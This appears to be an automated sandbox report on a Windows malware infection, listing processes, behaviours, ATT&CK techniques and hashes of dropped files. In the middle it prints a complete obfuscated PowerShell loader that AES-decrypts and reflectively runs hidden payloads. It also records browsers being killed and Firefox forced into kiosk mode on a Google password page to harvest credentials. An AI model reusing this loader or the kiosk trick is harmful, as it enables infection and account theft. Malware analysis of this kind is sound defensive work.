- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\1009993001\68f75721d4.exe"C:\Users\Admin\AppData\Local\Temp\1009993001\68f75721d4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3016
-
-
C:\Users\Admin\AppData\Local\Temp\1009994001\t6kzDd6.exe"C:\Users\Admin\AppData\Local\Temp\1009994001\t6kzDd6.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2432 -
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd"5⤵PID:3252
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd';$lAeq='GfZBCetCfZBCurfZBCrefZBCnfZBCtfZBCPrfZBCocfZBCefZBCsfZBCsfZBC'.Replace('fZBC', ''),'MaiPrpmnMoPrpmdPrpmulPrpmePrpm'.Replace('Prpm', ''),'CrIgJgeatIgJgeIgJgDeIgJgcIgJgryIgJgpIgJgtoIgJgrIgJg'.Replace('IgJg', ''),'EJqHmntJqHmrJqHmyPoJqHmintJqHm'.Replace('JqHm', ''),'EleDBwrmeDBwrntADBwrtDBwr'.Replace('DBwr', ''),'ChaFGFHnFGFHgFGFHeEFGFHxtFGFHeFGFHnsiFGFHonFGFH'.Replace('FGFH', ''),'TrFaEMansFaEMfoFaEMrmFaEMFinFaEMalBFaEMlFaEMockFaEM'.Replace('FaEM', ''),'IpACXnvpACXokpACXepACX'.Replace('pACX', ''),'Sssrbplissrbtssrb'.Replace('ssrb', ''),'DVGtReVGtRcomVGtRpreVGtRssVGtR'.Replace('VGtR', ''),'FroomPomBoomPasoomPe6oomP4SoomPtroomPingoomP'.Replace('oomP', ''),'ReaafWIdLafWIinafWIeafWIsafWI'.Replace('afWI', ''),'LIdMHoaIdMHdIdMH'.Replace('IdMH', ''),'CBGdXopBGdXyBGdXToBGdX'.Replace('BGdX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($lAeq[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function PvrJj($TpxZW){$NbCzo=[System.Security.Cryptography.Aes]::Create();$NbCzo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NbCzo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NbCzo.Key=[System.Convert]::($lAeq[10])('wn6tmbO/rOORgxj74qEsSdU2WhE4KPXIqhTJPDz2aPY=');$NbCzo.IV=[System.Convert]::($lAeq[10])('gHqzXB7DsEnzxXPGoUcHcg==');$PddqI=$NbCzo.($lAeq[2])();$ySKdP=$PddqI.($lAeq[6])($TpxZW,0,$TpxZW.Length);$PddqI.Dispose();$NbCzo.Dispose();$ySKdP;}function rEEVf($TpxZW){$QUakK=New-Object System.IO.MemoryStream(,$TpxZW);$zUBgT=New-Object System.IO.MemoryStream;$PwRDy=New-Object System.IO.Compression.GZipStream($QUakK,[IO.Compression.CompressionMode]::($lAeq[9]));$PwRDy.($lAeq[13])($zUBgT);$PwRDy.Dispose();$QUakK.Dispose();$zUBgT.Dispose();$zUBgT.ToArray();}$lkrNY=[System.IO.File]::($lAeq[11])([Console]::Title);$aZZTu=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 5).Substring(2))));$cSjRs=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 6).Substring(2))));[System.Reflection.Assembly]::($lAeq[12])([byte[]]$cSjRs).($lAeq[3]).($lAeq[7])($null,$null);[System.Reflection.Assembly]::($lAeq[12])([byte[]]$aZZTu).($lAeq[3]).($lAeq[7])($null,$null); "6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\clip64.dll, Main5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3220
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1980 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main6⤵PID:2656
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009995001\718fffc7bd.exe"C:\Users\Admin\AppData\Local\Temp\1009995001\718fffc7bd.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1672
-
-
C:\Users\Admin\AppData\Local\Temp\1009996001\fd115d1481.exe"C:\Users\Admin\AppData\Local\Temp\1009996001\fd115d1481.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:300
-
-
C:\Users\Admin\AppData\Local\Temp\1009997001\65bf6b8264.exe"C:\Users\Admin\AppData\Local\Temp\1009997001\65bf6b8264.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:604
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1768 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.0.694233693\1844678546" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1228 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb4d12f9-2097-462b-8d95-d5cf9c338b00} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 1300 eaeb758 gpu6⤵PID:2368
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.1.530899213\896492467" -parentBuildID 20221007134813 -prefsHandle 1508 -prefMapHandle 1504 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5734cf22-9eff-4d84-ab05-8901351e2a5d} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 1520 d74858 socket6⤵PID:576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.2.1114611128\1769003546" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 888 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d90625c-a665-43a4-ad92-26eb7cba02c2} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 2068 ea60058 tab6⤵PID:2692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.3.1244152802\341790273" -childID 2 -isForBrowser -prefsHandle 2788 -prefMapHandle 2784 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 888 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3897f9a7-c724-4994-8950-43e15827c95e} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 2800 1d02aa58 tab6⤵PID:1772
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.4.13209926\850272435" -childID 3 -isForBrowser -prefsHandle 3760 -prefMapHandle 3756 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 888 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac74f021-d155-4489-a474-9f97d2532a0a} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 3780 1db6af58 tab6⤵PID:952
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.5.458479679\957616640" -childID 4 -isForBrowser -prefsHandle 3880 -prefMapHandle 3884 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 888 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {894b1fa9-cde4-49e2-9d54-8651ee3d3a07} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 3868 1db68858 tab6⤵PID:2132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1768.6.1436252827\2130662461" -childID 5 -isForBrowser -prefsHandle 4144 -prefMapHandle 4148 -prefsLen 26356 -prefMapSize 233444 -jsInitHandle 888 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e66f013a-27b2-47ee-bc15-90fcc030a003} 1768 "\\.\pipe\gecko-crash-server-pipe.1768" 4100 204ee558 tab6⤵PID:2016
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009998001\237cfded39.exe"C:\Users\Admin\AppData\Local\Temp\1009998001\237cfded39.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\1009999001\45dc7b2666.exe"C:\Users\Admin\AppData\Local\Temp\1009999001\45dc7b2666.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3668
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Defense Evasion
Impair Defenses
2Disable or Modify Tools
2Modify Registry
4Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54c902aff898a1da59c11241a6251fb82
SHA14062f0c6dd635875e3188b8a6e2cbd3db01af238
SHA25622aad5653893eb367c11bd645ba3a517728db8071de3090cd688ec07cc52ca20
SHA512043e07ab0efe5196fba4dbbaaef174ee92ba6260b614cfa6420d5fdb20b9aa746fb33e68cf49faa1dd442a2857cadaf96010d6e75fde826504d6f81588b1aa00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8452S9S3\download[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\activity-stream.discovery_stream.json.tmp
Filesize23KB
MD52a3494bcea29da78cad252ed1975da74
SHA128fbbb9c044564c631495ab25f0b0a51ea447fe9
SHA256f0aa17c115bcb2526af24400f8bbaf8a1898b67f1a7425a9840b0b0ac29fd5ad
SHA5126170170fabe2857749f74c8eaf0b28db1f154651ec5a4b3ebf85546c4ab636edc9d12e3c79c6a2e2839134ff833ea7798996638961f574dadeb98e66e8afaeb1
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bhg31lui.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize13KB
MD5f99b4984bd93547ff4ab09d35b9ed6d5
SHA173bf4d313cb094bb6ead04460da9547106794007
SHA256402571262fd1f6dca336f822ceb0ec2a368a25dfe2f4bfa13b45c983e88b6069
SHA512cd0ed84a24d3faae94290aca1b5ef65eef4cfba8a983da9f88ee3268fc611484a72bd44ca0947c0ca8de174619debae4604e15e4b2c364e636424ba1d37e1759
-
Filesize
2.0MB
MD54a3bf35b9c2d6577e142da237ff5e25b
SHA15fd2b806318daf1e5522845d562a1e978dc46f49
SHA2565c593a57c0028a269f29d291a478ef4a11344b77bc4267d3d90cc2e4ad8dbff7
SHA512a7a84eb933d4a4664765898217a169fc2edc30bf068ffbd52304ee9a588517a17d965eceea084571f8790fd25828b5d4857a8631b706fa879d8b479a2179256e
-
Filesize
2.4MB
MD598c07fea9bc60a8d90ae1b2c205e471b
SHA1e088f4ddcf646d9d3d823bfc67de5792d60a45e2
SHA2567a7320ea11f7363ba658c1e371e89cf4964d9eb4f88bb92e18490bf1f506c18f
SHA512aaae87d544aa2c4e950a63a3bba9206e916b7343d22692d5fdd5ad5db4abb3b0329ae621aac276992d05975876362dfe1b8d549e2887350eee37883ef3850a45
-
Filesize
1.8MB
MD5fe7fb9fce44017e9650fadf0851ffffb
SHA15f2e8e26ba53bf996835917cd6bf8da7a0c48ffd
SHA2566c8a2ebe3061f4cba5540d03c6c20cacb70173ca6d250862fe51a173c74ea0d4
SHA512a86e22b71dce2142a5a4c5d9b48a3d69cc54c73ceedc691988e9a45aff4066112ede4aa820f8966071ddfa4c7e1d28361c9ef30938de0ce4ba0bc10a04d39e63
-
Filesize
1.7MB
MD5c7199ff1c5f695591c33069315052e3a
SHA12d5c03040c26c5cba6ae8f080c82ac6cb75e7e6d
SHA256aa0766db9945bf02ba2332f0cde32da92e9404c788fa4e3915d96c6d63ed97b7
SHA512cf9e108b7ec9bf5e15a41d4169ad4a648dbef0210860696f0114ae266dbf3053fe924a256b6bad95ab9d001c3014cdd053ca6f7280a26c77cf1069cd27f18c7c
-
Filesize
900KB
MD5434de113c6abd3382ac3aadca9b4494f
SHA12c0e2b4e867231b4e6f8da090dfa5d94ff9d4181
SHA256b363c3f6c453d1801916e18abdb3d5d5758a88d9787e162d29874e1a594d4b98
SHA512170d71c1056900db272ead06efb42f504809febe72eaaa7a862997a2f4b3d808d851f10eeca7a6a43391d90889b39c760d4599e71d3b464fff07b23a6363b147
-
Filesize
2.7MB
MD57fa6c5dc1a73c43e1d3021bd80b1edcc
SHA1b2370531a615a90d5f03b22ce0f5ef28451fbd25
SHA25637e8ff5c6198af2865003e77948f401cdd2a5cfd6112b8dc13b216c3f9322ad2
SHA512030d604e821eea0e4c976cad2cb2354bbc70bf06d312852de18b12e1218cc7069dcbaec448ac2fdb6fbd08be490bf9c76ff05e25563e49e52a505821ad33aa8e
-
Filesize
4.3MB
MD5fb900659d36610b68b34328064a9f5c8
SHA118d678488a119939b5466179be52dc9627bf240a
SHA256c208e6f9ba39de74c5e47c9ab78c5c9d5af0fa55d1ed96f2bc6092ed91f1df07
SHA512a8ba185466b5e155d2f70ad6179c2e686241fe87ba2660ffbf7d5237740e890e4f7375db0dc6fc732cc38a878a7a1e59b1a9e5f7938c87a32fa1b7c81ebdb6e3
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
1.8MB
MD5f0ecf1a8076890546c2210d5373f498a
SHA11997eb844617f4770b81cf3c0ff9cefbdc401853
SHA256b40bca0264f21f6ad389319dd05a41d8168a8ac3e150ac1b2e21293711e62f18
SHA5125e0debf6e8a8f8747644bc6bd58ecbd01f6db52f8271d56b1b1f832fb9d201329cf54534316ca9fdd290044236a7b15a5468f2353ad079531a55910587e95a01
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
Filesize
8.0MB
MD5e0fc8ae43180601da288c7c404d36a95
SHA117f3307ba13cb61fa1b8c906215c1462355fdadb
SHA256c49da39d0da56555c773a2ffc184b2040be0d2de5594651b7d8ba169af9e82ef
SHA5128d8feacdad6414bd10a33f8589f991615ba03506e016e0dc7085a8a5d9350e7e2b6ae12b164828f2d42996a1f7c70d713063971cb6edcfe6076e4c485dfa7e13
-
Filesize
4.0MB
MD579437719ed8d5d53362720ca051e96d0
SHA1ed251684fce0437974de1165d84d5815f1a9ae3a
SHA25637c34b8222fe45b64ba8d71dc07e268215cf617d288eae48fae56b9142c5808d
SHA512a93f74d3a890720d587be942c55e32e96df223a220368f970c8d4bb2245b2c863ef7c48ba395ff1d061c0c158dd2c8fdff74b0e44ffa77d2fc4ab1c7aaa3f508
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5b25bd0a8dc6373a0c2d1d50bdbc81f11
SHA1dc2990452e475384674d15e73cdec046d8203b96
SHA256a91652e1c1a65e82009c08ac1c617414f0da86199c96814c6d5997d29c8d468f
SHA512aad387bf6570153c28cc029d2531c818cc777d09742f2fa4a5c91401fc4eabea33c373e4776716da3482cb90033ba4d5a533dad10eac3bf87079a2f8682e7cbe
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\672cd2af-a1d5-4673-ac23-d7b9e20feb1b
Filesize11KB
MD55e153516c2b0308d8c462338069a7944
SHA197bc3163fa70201ba55634ac1a5997ef8fc4a0da
SHA25645562dc4796c66d9c68f6a8648dacab95508b05fea46e15d979c521b77dee75c
SHA512e4c9ab91adf256d18cf5276d01a43ae57e9bc5577eb49b5195962cdb12da2020d1049d3bb0d0f9f095f4ee1ee9121e3175a38b390d8d2ac0fccc14fae1f436d8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\8cb9c10e-1526-40ea-902c-0f63ce622585
Filesize745B
MD531c069dc012d8c7c4e3627679485c236
SHA1bc62c4f6704d545c8c451048154b00df01cd1aaf
SHA2564849abbde1b0c35d7ab80df004a112a4bd5277789ca0b1185e7e9793e2487d27
SHA512e060eb14e32c6c585a282acab77d2b9d246b521a61ea86674eeef2509373ac42af55212ba4d3b940aed13c3400671ec93232510d979f05b998675cf1f289ee9d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD523f417c79e5282975028e35747fd1c68
SHA1f54238ce6a08e2348a3739abbfe7c1ab468d1952
SHA256eda627322c91a9ab153cee6dbfab166341760fde40023d9fc3dcf3ba789949e0
SHA5128d8dc4b31c7269c3ef03be964a64b8702e26673bd28684db24b896821472d9769d3c8a87f8498e63baeb29267d7c593dbac7078731feac8ef9643acbc9be83d4
-
Filesize
6KB
MD5bfd67189f7f35a995123fc127a81b2bd
SHA19b1693f728c4b5d3646b6fe7e1c853985360d274
SHA256d3b25d608a597e28a572aa433d7def3d11b8eb7901a1d2d964eae8751a09f1b6
SHA51235f15d21191c53361eaa4ea1cadbae5e46cee024fe0dee4b4bc348a6e9a4d28db3e94afa638b83933da1e2f9b8ac4e741a86707825d194eb64c44d5210f54c04
-
Filesize
7KB
MD58de9e090c5d843867817d03d3678b257
SHA14c223ce026b8c5e404de776a83ab1f0635bbc7c0
SHA256751fb4d7cb1d1945de5ae0c8e26836d249506f5234b7200dc4e06e382d5833f5
SHA51237deaaefd3d778afba15a932786cc3aac9c7de6799f2e25e951ba602615c30807af518c599110395487031d2e3f6521b699c93047954ef443e77f6de2c65ec06
-
Filesize
6KB
MD5eaeb00b67fb11c0dbb397f128c66c64b
SHA10c53206aed97e29118994b5b30f25b19fe9abc3d
SHA256f0918db4b93dd7e9262829b3309c3ca21010d5f5a3b87711a59d3370f430dcf4
SHA512b5363ef7fb35cb876d222eb098b4b4f8b99257ee5bb643005081e65922d64870d1e18263d5e5bf910de3d3ffe9032d704cdd54391b3ab0f566339bc4c307f828
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD59581d47210af246f70014eddc184260d
SHA17bef652127d771fc7169a54ff4488c7c198fff98
SHA256c353f13034151be1ad3ffe16c7c08cf253f3dd4112d22d1f5c4f4159b3438895
SHA512d19c83ae347159e52a120cdd8c7b133448ad641b4cdebd0988c490781fbfb218e294d22d59d82fde8795c8678152450525dd2e9b2b90f6ef4f23f0150645963f
-
Filesize
124KB
MD56e634793e84d6039856e1c0f93eccc62
SHA10dc5154964c24d8db59e1e57a84e0fa015d07d6b
SHA2561a6d5459303d5bbd7106ec8ba2710372b674e27002b1c896718b8c962c559bfa
SHA512a94d738bd21276adf9f7bb530a72f5f9d76717d5e84d82aadb07e2991494cd6dbeef2c05a7ebad19a3c99b86a7066b18f15f984936199e115218c11e2d2b0dd3
-
Filesize
1.2MB
MD5436830b10b70f60fc5fbfaf0de1dbf65
SHA15aad41575619d74edaa16f984fb9538fa0fbe23e
